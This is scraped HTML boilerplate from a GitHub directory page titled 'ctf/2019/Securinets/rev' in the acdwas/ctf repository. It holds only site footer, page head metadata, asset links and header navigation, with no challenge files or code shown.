<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf/2019/Securinets/rev at master · acdwas/ctf · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="EBA2:6BE1:1C84C953:1D5B533E:64122516" data-pjax-transient="true"/><meta name="html-safe-nonce" content="78e6be2ad26ae6f234c284e19608cd49509013dcfe2d3698ad4d46099461a346" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFQkEyOjZCRTE6MUM4NEM5NTM6MUQ1QjUzM0U6NjQxMjI1MTYiLCJ2aXNpdG9yX2lkIjoiMjIzODU0MDQzNTI3NzYyMDUwMiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="4252b8f78525c46dcd29f5e0a5d38408de7d5c9e9f805491e5079e0894a3f075" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:124655323" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to acdwas/ctf development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9b98b72adb831b3851b01805511beba058a5c295fb1ddd78c19386b02ddab30b/acdwas/ctf" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf/2019/Securinets/rev at master · acdwas/ctf" /><meta name="twitter:description" content="Contribute to acdwas/ctf development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9b98b72adb831b3851b01805511beba058a5c295fb1ddd78c19386b02ddab30b/acdwas/ctf" /><meta property="og:image:alt" content="Contribute to acdwas/ctf development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf/2019/Securinets/rev at master · acdwas/ctf" /><meta property="og:url" content="https://github.com/acdwas/ctf" /><meta property="og:description" content="Contribute to acdwas/ctf development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/acdwas/ctf git https://github.com/acdwas/ctf.git">
<meta name="octolytics-dimension-user_id" content="17169107" /><meta name="octolytics-dimension-user_login" content="acdwas" /><meta name="octolytics-dimension-repository_id" content="124655323" /><meta name="octolytics-dimension-repository_nwo" content="acdwas/ctf" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="124655323" /><meta name="octolytics-dimension-repository_network_root_nwo" content="acdwas/ctf" />
<link rel="canonical" href="https://github.com/acdwas/ctf/tree/master/2019/Securinets/rev" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
